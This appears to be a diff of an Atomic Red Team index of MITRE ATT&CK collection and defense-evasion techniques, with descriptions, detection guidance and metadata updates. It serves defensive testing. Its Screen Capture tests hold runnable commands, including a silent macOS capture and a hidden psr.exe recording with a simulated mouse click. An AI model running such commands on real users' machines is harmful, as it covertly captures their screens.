+ Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual)
+ name: Man in the Browser
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-07-14T19:39:44.590Z'
+ created: '2018-01-16T16:13:52.465Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Justin Warner, ICEBRG
+ x_mitre_data_sources:
+ - Authentication logs
+ - Packet capture
+ - Process monitoring
+ - API monitoring
+ x_mitre_detection: This is a difficult technique to detect because adversary
+ traffic would be masked by normal user traffic. No new processes are created
+ and no additional software touches disk. Authentication logs can be used to
+ audit logins to specific web applications, but determining malicious logins
+ versus benign logins may be difficult if activity matches typical user behavior.
+ Monitor for process injection against browser applications
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
+ T1557:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1557
+ url: https://attack.mitre.org/techniques/T1557
+ - external_id: CAPEC-94
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/94.html
+ - source_name: Rapid7 MiTM Basics
+ url: https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/
+ description: Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March
+ 2, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Man-in-the-Middle
+ description: |-
+ Adversaries may attempt to position themselves between two or more networked devices using a man-in-the-middle (MiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)
+
+ Adversaries may leverage the MiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.
+ id: attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-16T15:19:48.733Z'
+ created: '2020-02-11T19:07:12.114Z'
+ x_mitre_contributors:
+ - Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project
+ x_mitre_detection: Monitor network traffic for anomalies associated with known
+ MiTM behavior. Consider monitoring for modifications to system configuration
+ files involved in shaping network traffic flow.
+ x_mitre_data_sources:
+ - File monitoring
+ - Netflow/Enclave netflow
+ - Packet capture
+ x_mitre_permissions_required:
+ - User
+ x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ atomic_tests: []
+ T1602.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1602.002
+ url: https://attack.mitre.org/techniques/T1602/002
+ - source_name: US-CERT TA18-106A Network Infrastructure Devices 2018
+ url: https://us-cert.cisa.gov/ncas/alerts/TA18-106A
+ description: US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors
+ Targeting Network Infrastructure Devices. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ - source_name: US-CERT TA18-068A 2018
+ url: https://www.us-cert.gov/ncas/alerts/TA18-086A
+ description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
+ by Cyber Actors. Retrieved October 2, 2019.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Network Device Configuration Dump
+ description: "Adversaries may access network configuration files to collect
+ sensitive data about the device and the network. The network configuration
+ is a file containing parameters that determine the operation of the device.
+ The device typically stores an in-memory copy of the configuration while operating,
+ and a separate configuration on non-volatile storage to load after device
+ reset. Adversaries can inspect the configuration files to reveal information
+ about the target network and its layout, the network device and its software,
+ or identifying legitimate accounts and credentials for later use.\n\nAdversaries
+ can use common management tools and protocols, such as Simple Network Management
+ Protocol (SNMP) and Smart Install (SMI), to access network configuration files.
+ (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation:
+ Cisco Blog Legacy Device Attacks) These tools may be used to query specific
+ data from a configuration repository or configure the device to export the
+ configuration for later analysis. "
+ id: attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-22T01:45:55.144Z'
+ created: '2020-10-20T00:08:21.745Z'
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Network protocol analysis
+ - Packet capture
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
+ or networks. Configure signatures to identify strings that may be found in
+ a network device configuration. (Citation: US-CERT TA18-068A 2018)'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
+ T1074.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1074.002
+ url: https://attack.mitre.org/techniques/T1074/002
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Remote Data Staging
+ description: |-
+ Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
+
+ In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
+
+ By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.
+ id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-09-14T19:48:07.491Z'
+ created: '2020-03-13T21:14:58.206Z'
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: |-
+ Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
+
+ Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - AWS
+ - GCP
+ - Azure
+ atomic_tests: []
+ T1114.002:
+ technique:
+ created: '2020-02-19T18:52:24.547Z'
+ modified: '2020-02-19T20:53:50.908Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a
+ description: Adversaries may target an Exchange server or Office 365 to collect
+ sensitive information. Adversaries may leverage a user's credentials and interact
+ directly with the Exchange server to acquire information from within a network.
+ Adversaries may also access externally facing Exchange services or Office
+ 365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413)
+ can be used to automate searches for specific keywords.
+ name: Remote Email Collection
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1114.002
+ url: https://attack.mitre.org/techniques/T1114/002
+ x_mitre_platforms:
+ - Office 365
+ - Windows
+ x_mitre_data_sources:
+ - Authentication logs
+ - Email gateway
+ - Mail server
+ - Office 365 trace logs
+ x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
+ locations, especially for privileged accounts (ex: Exchange administrator
+ account).'
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ atomic_tests: []
+ T1602.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1602.001
+ url: https://attack.mitre.org/techniques/T1602/001
+ - source_name: SANS Information Security Reading Room Securing SNMP Securing
+ SNMP
+ url: https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051
+ description: 'Michael Stump. (2003). Information Security Reading Room Securing
+ SNMP: A Look atNet-SNMP (SNMPv3). Retrieved October 19, 2020.'
+ - source_name: US-CERT-TA18-106A
+ url: https://www.us-cert.gov/ncas/alerts/TA18-106A
+ description: US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored
+ Cyber Actors Targeting Network Infrastructure Devices. Retrieved October
+ 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ - source_name: Cisco Advisory SNMP v3 Authentication Vulnerabilities
+ url: https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3
+ description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
+ of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
+ 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: SNMP (MIB Dump)
+ description: "Adversaries may target the Management Information Base (MIB) to
+ collect and/or mine valuable information in a network managed using Simple
+ Network Management Protocol (SNMP).\n\nThe MIB is a configuration repository
+ that stores variable information accessible via SNMP in the form of object
+ identifiers (OID). Each OID identifies a variable that can be read or set
+ and permits active management tasks, such as configuration changes, through
+ remote modification of these variables. SNMP can give administrators great
+ insight in their systems, such as, system information, description of hardware,
+ physical location, and software packages(Citation: SANS Information Security
+ Reading Room Securing SNMP Securing SNMP). The MIB may also contain device
+ operational information, including running configuration, routing table, and
+ interface details.\n\nAdversaries may use SNMP queries to collect MIB content
+ directly from SNMP-managed devices in order to collect network information
+ that allows the adversary to build network maps and facilitate future targeted
+ exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device
+ Attacks) "
+ id: attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-22T01:54:22.812Z'
+ created: '2020-10-19T23:51:05.953Z'
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Network protocol analysis
+ - Packet capture
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
+ or networks that expose MIB content or use unauthorized protocols.(Citation:
+ Cisco Advisory SNMP v3 Authentication Vulnerabilities)'
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
+ T1113:
+ technique:
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1113
+ url: https://attack.mitre.org/techniques/T1113
+ - external_id: CAPEC-648
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/648.html
+ - source_name: CopyFromScreen .NET
+ url: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8
+ description: Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved
+ March 24, 2020.
+ - url: https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/
+ description: Thomas Reed. (2017, January 18). New Mac backdoor using antiquated
+ code. Retrieved July 5, 2017.
+ source_name: Antiquated Mac Malware
+ description: 'Adversaries may attempt to take screen captures of the desktop
+ to gather information over the course of an operation. Screen capturing functionality
+ may be included as a feature of a remote access tool used in post-compromise
+ operations. Taking a screenshot is also typically possible through native
+ utilities or API calls, such as CopyFromScreen, xwd,
+ or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated
+ Mac Malware)
+
+'
+ name: Screen Capture
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-24T19:56:37.627Z'
+ created: '2017-05-31T21:31:25.060Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - File monitoring
+ x_mitre_detection: Monitoring for screen capture behavior will depend on the
+ method used to obtain data from the operating system and write output files.
+ Detection methods could include collecting information from unusual processes
+ using API calls used to obtain image data, and monitoring for image files
+ written to disk. The sensor data may need to be correlated with other events
+ to identify malicious activity, depending on the legitimacy of this behavior
+ within a given network environment.
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ identifier: T1113
+ atomic_tests:
+ - name: Screencapture
+ auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac
+ description: 'Use screencapture command to collect a full desktop screenshot
+
+'
+ supported_platforms:
+ - macos
+ input_arguments:
+ output_file:
+ description: Output file path
+ type: Path
+ default: "/tmp/T1113_desktop.png"
+ executor:
+ command: 'screencapture #{output_file}
+
+'
+ cleanup_command: 'rm #{output_file}
+
+'
+ name: bash
+ - name: Screencapture (silent)
+ auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4
+ description: 'Use screencapture command to collect a full desktop screenshot
+
+'
+ supported_platforms:
+ - macos
+ input_arguments:
+ output_file:
+ description: Output file path
+ type: Path
+ default: "/tmp/T1113_desktop.png"
+ executor:
+ command: 'screencapture -x #{output_file}
+
+'
+ cleanup_command: 'rm #{output_file}
+
+'
+ name: bash
+ - name: X Windows Capture
+ auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac
+ description: 'Use xwd command to collect a full desktop screenshot and review
+ file with xwud
+
+'
+ supported_platforms:
+ - linux
+ input_arguments:
+ output_file:
+ description: Output file path
+ type: Path
+ default: "/tmp/T1113_desktop.xwd"
+ executor:
+ command: |
+ xwd -root -out #{output_file}
+ xwud -in #{output_file}
+ cleanup_command: 'rm #{output_file}
+
+'
+ name: bash
+ - name: Capture Linux Desktop using Import Tool
+ auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1
+ description: 'Use import command from ImageMagick to collect a full desktop
+ screenshot
+
+'
+ supported_platforms:
+ - linux
+ input_arguments:
+ output_file:
+ description: Output file path
+ type: Path
+ default: "/tmp/T1113_desktop.png"
+ dependencies:
+ - description: 'ImageMagick must be installed
+
+'
+ prereq_command: 'if import --version; then exit 0; else exit 1; fi
+
+'
+ get_prereq_command: 'sudo apt-get -y install imagemagick
+
+'
+ executor:
+ command: 'import -window root #{output_file}
+
+'
+ cleanup_command: 'rm #{output_file}
+
+'
+ name: bash
+ - name: Windows Screencapture
+ auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153
+ description: 'Use Psr.exe binary to collect screenshots of user display. Test
+ will do left mouse click to simulate user behaviour
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ output_file:
+ description: Output file path
+ type: Path
+ default: c:\temp\T1113_desktop.zip
+ recording_time:
+ description: Time to take screenshots
+ type: String
+ default: 5
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ cmd /c start /b psr.exe /start /output #{output_file} /sc 1 /gui 0 /stopevent 12
+ Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W;
+ [W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0);
+ cmd /c "timeout #{recording_time} > NULL && psr.exe /stop"
+ cleanup_command: 'rm #{output_file} -ErrorAction Ignore'
+ T1213.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1213.002
+ url: https://attack.mitre.org/techniques/T1213/002
+ - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+ description: Microsoft. (2017, July 19). Configure audit settings for a site
+ collection. Retrieved April 4, 2018.
+ source_name: Microsoft SharePoint Logging
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Sharepoint
+ description: |
+ Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
+
+ * Policies, procedures, and standards
+ * Physical / logical network diagrams
+ * System architecture diagrams
+ * Technical system documentation
+ * Testing / development credentials
+ * Work / project schedules
+ * Source code snippets
+ * Links to network shares and other internal resources
+ id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-24T16:41:00.821Z'
+ created: '2020-02-14T13:35:32.938Z'
+ x_mitre_detection: "The user access logging within Microsoft's SharePoint can
+ be configured to report access to certain pages and documents. (Citation:
+ Microsoft SharePoint Logging). As information repositories generally have
+ a considerably large user base, detection of malicious use can be non-trivial.
+ At minimum, access to information repositories performed by privileged users
+ (for example, Active Directory Domain, Enterprise, or Schema Administrators)
+ should be closely monitored and alerted upon, as these types of accounts should
+ not generally used to access information repositories. If the capability exists,
+ it may be of value to monitor and alert on users that are retrieving and viewing
+ a large number of documents and pages; this behavior may be indicative of
+ programmatic means being used to retrieve all data within the repository.
+ In environments with high-maturity, it may be possible to leverage User-Behavioral
+ Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - Authentication logs
+ - Application logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ - Office 365
+ atomic_tests: []
+ T1125:
+ technique:
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1125
+ external_id: T1125
+ - external_id: CAPEC-634
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/634.html
+ - url: https://objective-see.com/blog/blog_0x25.html
+ description: Patrick Wardle. (n.d.). Retrieved March 20, 2018.
+ source_name: objective-see 2017 review
+ description: |-
+ An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
+
+ Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.
+
+ In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)
+ name: Video Capture
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-07-14T19:40:47.644Z'
+ created: '2017-05-31T21:31:37.917Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ - API monitoring
+ x_mitre_detection: |-
+ Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
+
+ Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ atomic_tests: []
+ T1056.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1056.003
+ url: https://attack.mitre.org/techniques/T1056/003
+ - external_id: CAPEC-569
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/569.html
+ - url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
+ description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco
+ Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.'
+ source_name: Volexity Virtual Private Keylogging
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Web Portal Capture
+ description: |-
+ Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
+
+ This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)
+ id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ modified: '2020-03-24T21:16:16.580Z'
+ created: '2020-02-11T18:59:50.058Z'
+ x_mitre_system_requirements:
+ - An externally facing login portal is configured.
+ x_mitre_data_sources:
+ - File monitoring
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
- x_mitre_data_sources:
- - File monitoring
- x_mitre_system_requirements:
- - An externally facing login portal is configured.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
defense-evasion:
T1548:
@@ -21562,7 +25175,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-25T19:57:54.923Z'
+ modified: '2020-07-22T21:36:52.825Z'
created: '2020-01-30T13:58:14.373Z'
x_mitre_data_sources:
- Windows Registry
@@ -21692,23 +25305,26 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1550.001
url: https://attack.mitre.org/techniques/T1550/001
+ - external_id: CAPEC-593
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/593.html
- description: Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure
APIs. Retrieved September 12, 2019.
url: https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/
source_name: Auth0 - Why You Should Always Use Access Tokens to Secure APIs
Sept 2019
- - source_name: okta
- url: https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen
- description: okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved
+ - description: okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved
September 12, 2019.
- - source_name: Microsoft Identity Platform Access 2019
- url: https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
- description: Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27).
+ url: https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen
+ source_name: okta
+ - description: Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27).
Microsoft identity platform access tokens. Retrieved October 4, 2019.
- - source_name: Staaldraad Phishing with OAuth 2017
- url: https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/
- description: Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure.
+ url: https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
+ source_name: Microsoft Identity Platform Access 2019
+ - description: Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure.
Retrieved October 4, 2019.
+ url: https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/
+ source_name: Staaldraad Phishing with OAuth 2017
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -21728,9 +25344,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-03-23T20:24:52.899Z'
+ modified: '2020-09-16T19:40:02.024Z'
created: '2020-01-30T17:37:22.261Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_defense_bypassed:
- System Access Controls
@@ -22072,6 +25688,9 @@ defense-evasion:
- external_id: CAPEC-572
source_name: capec
url: https://capec.mitre.org/data/definitions/572.html
+ - external_id: CAPEC-655
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/655.html
- source_name: ESET OceanLotus
description: Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using
old tricks. Retrieved May 22, 2018.
@@ -22081,7 +25700,7 @@ defense-evasion:
description: Ishimaru, S.. (2017, April 13). Old Malware Tricks To Bypass
Detection in the Age of Big Data. Retrieved May 30, 2019.
- source_name: VirusTotal FAQ
- url: 'https://www.virustotal.com/en/faq/ '
+ url: https://www.virustotal.com/en/faq/
description: VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
@@ -22106,7 +25725,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T20:50:48.023Z'
+ modified: '2020-09-17T18:25:33.828Z'
created: '2020-02-05T14:04:25.865Z'
x_mitre_contributors:
- Martin Jirkal, ESET
@@ -22121,7 +25740,7 @@ defense-evasion:
exhibit other behavior characteristics of being used to conduct an intrusion
such as system and network information Discovery or Lateral Movement, which
could be used as event indicators that point to the source file. '
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
@@ -22171,6 +25790,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1542.003
url: https://attack.mitre.org/techniques/T1542/003
+ - external_id: CAPEC-552
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/552.html
- source_name: Mandiant M Trends 2016
url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved
@@ -22196,13 +25818,13 @@ defense-evasion:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-05-07T22:32:05.335Z'
+ modified: '2020-09-17T19:47:14.338Z'
created: '2019-12-19T21:05:38.123Z'
x_mitre_defense_bypassed:
- Host intrusion prevention systems
- Anti-virus
- File monitoring
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
@@ -22231,7 +25853,7 @@ defense-evasion:
* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
- name: Bypass User Access Control
+ name: Bypass User Account Control
